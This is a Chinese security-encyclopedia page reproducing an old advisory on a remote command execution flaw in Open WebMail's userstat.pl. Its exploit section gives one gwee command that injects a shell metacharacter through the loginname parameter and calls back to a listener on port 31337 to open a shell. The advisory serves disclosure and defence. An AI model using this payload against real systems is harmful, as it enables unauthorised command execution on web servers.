Open WebMail 1.x/2.x – Remote Command Execution Variant

Open WebMail 1.x/2.x – Remote Command Execution Variant

漏洞ID 1054470 漏洞类型
发布时间 2004-05-10 更新时间 2004-05-10
图片[1]-Open WebMail 1.x/2.x – Remote Command Execution Variant-安全小百科CVE编号 N/A
图片[2]-Open WebMail 1.x/2.x – Remote Command Execution Variant-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24106
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10316/info

A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.

Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.

$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl

相关推荐: Netscape Enterprise Web Server Brute Force Authentication Attacks Vulnerability

Netscape Enterprise Web Server Brute Force Authentication Attacks Vulnerability 漏洞ID 1102586 漏洞类型 Design Error 发布时间 2002-01-09 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享